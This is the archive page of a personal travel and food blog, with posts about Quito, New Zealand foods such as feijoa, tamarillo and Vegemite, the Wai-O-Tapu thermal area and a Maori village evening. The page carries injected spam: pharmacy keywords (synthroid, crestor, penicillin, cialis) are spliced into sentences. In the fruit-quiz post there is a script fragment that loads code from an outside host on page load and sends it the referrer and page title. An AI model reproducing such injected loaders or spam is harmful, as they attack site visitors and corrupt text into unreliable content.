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Archive for the ‘Food’ Category

Beautiful colonial Quito

Posted by Susanna On October - 4 - 2010

Ecuadors capital Quito is wonderful. Everywhere you see old colonial style houses and churches. The streets and especially the Plaza Grande. After the coup the army was standing around the Palacio de Carondelet. I actually felt like a giant between all those small people. Even the soldiers were smaller… It is good to be back in South America. The people are so warm and friendly and it is easy to talk to people everywhere.

synthroid shelf life Basilica de voto nationale

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Have you ever tried grasshoppers?

Posted by admin On November - 18 - 2008

Oh my god, guess what? I did it – I was eating my first grasshoppers in my life. I eat five. But after that I thought it might be enough for today… How they taste…. mhhh, crunchy and like popcorn with salsa. But not as bad as I expected.

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Funny food news

Posted by admin On May - 24 - 2006

What’s that?

Yummy Yams. To be honest yams taste after nothing, just looking weird.

That’s a Choko another strange crestor 10mg price uk vegetable.

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Seven Laughs Sake

Posted by admin On May - 5 - 2006

After starting my work on the 2000 words essay for university in the evening I met Russell, Mandy and James at a nice sake bar (www.sakebars.co.nz) in the city. We waited 10min for a table but finally we got a good one with view over the whole restaurant. Each sake here got a diffrent funny name so we ordered “Seven Laughs” sake and it was funny.

But later on after Seven Laughs there was no bottle save anymore… I guess we are all a bit bottle addicted…
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One Tree Hill

Posted by admin On April - 30 - 2006

Had breakfast today with Scott and he showed me “One Tree Hill” a famous view point of Auckland. Here I practice doing photos with the new filters for blue sky which Scott borrow me. This hill used to have one tree on the top, that’s where the name came from. But about five years ago some Maori activist killed the tree. Stupid. Now there is only the memorial obelisk on that hill. That’s autum in New Zealand looks like… starts to become colder now.

Later I did new pictures for the collection of strange food / fruit.
Kiwano (horned melon) is picked green, ripened orange, the fruit tastes like a mix of cucumber, lemon, lime and banana.
Tamarillo is also called tree tomato but doesnt taste like tomato.
And I had to take a picture of my favorite burger – Burgerfuel! I don’t use to eat fastfood but there are great!

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From dusk…

Posted by admin On April - 21 - 2006

Friday evening I started in Auckland for a trip on the east coast of the north island of New Zealand. Somebody I knew offered to give me a ride since I don’t have a car.  On the way I saw a massive kiwi sign at a big kiwi plantation. We were in no rush so in the evening we arrived in Whakatane a town at the Bay of Plenty. It was just the right time for making nice sunset photos at the beach. Then I had a great dinner with delicious seafood and I decided to get up at 5:00am the next morning for taking pictures of the sunrise at the ocean.

Don’t forget: If you’re cooking shellfish like this mussels above – cook them in their own juice! Only then you have the typical mussel taste because the water inside is salty. The tap water spoils the taste. Just put enough water in the pot that the ground is filled – not more! Cook them until they open themselves – ready! Mhhhmmmm…..

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Hot cross buns

Posted by admin On April - 10 - 2006

In New Zealand over Easter they have the tradition to eat hot cross buns. This are little spiced bun with white crosses on the top. Taste a bit after german “Lebkuchen”. Delicious!

And this are my favourite sweet – Mellow Puffs. You can only by them in New Zealand.

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All about Vegemite

Posted by admin On March - 28 - 2006

As a European – have you ever heard about Vegemite? I don’t. It’s a typical “down under thing”. Kind of yeast for putting on toast also they like it on toast with chips. I´m not really convinced…

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Do you know this fruits?!

Posted by admin On March - 27 - 2006

What is it?




A) Feijoa
B) Guava
C) Nashi order penicillin overnight s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

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“Lady Knox” and other hot stuff

Posted by admin On March - 6 - 2006

Today we got up pretty early. We will visit the Wai-O-Tapu Thermal Wonderland near Rotorua. At 10:00am the geyser “Lady Knox” start it´s show. They provoked it with soap so it’s predictable when “Lady Knox” will spit.

After seeing this miracle we went straight to the Thermal Wonderland. It should be New Zealand’s most colorful and diverse volcanic area. And in fact – it is. The area it´s about 18 sq.km and it´s covered with collapsed craters, cold and boiling pools of mud, water and steaming fumaroles. Since 160000 years is this area associated with volcanic activity. The water of the Wai-O-Tapu stream incorporates the minerals of the boiling springs and the volcanic gases what make it impossible to life in.

The wide range of colors in the area due to different mineral elements, the predominate colors being:

Yellow/primrose: sulphur Orange: antimony
White: silica Green: colloidal sulphur/ferrous salts
Red-brown: iron oxide Black: sulphur and carbon
Purple: manganese oxide

Unfortunately you can’t smell how it smelt like – almost like rotten eggs because of the sulphur. Everywhere…
After the trip through the Thermal Wonderland we drove at a place with boiling mud wholeswhich is close by. And then we did the best: We went to a hidden place in the forest (almost only Kiwi-known) and enjoy a real authentic free “Hot Spring”. It was so great I could have stayed for hours in there. It was so hot, felt like in a jacuzzi.

cialis billig Lady Knox & Wai-O-Tapu Thermal Wonderland

In the evening I watched a Maori event at the Mitai Maori Village. They made a Maori show, a hangi (it’s there special traditional way of preparing food at hole in the ground) and a night walk through their forest (in NZ we say bush) to see the glow worms and the fish at their lake. The forest remind me on a enchanted fairytale forest. Here the glow worms are blue while in Germany glow worms are kind of white / yellow. I ate so much of the good traditional food that I could not sleep the whole night. Got stomach cramps.  It was not easy to do good pictures, had sat in a bad angle.. So sorry for that…

Mitai Maori Village

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About Me

“There is always some madness in love. But there is also always some reason in madness.”
by Friedrich Nietzsche


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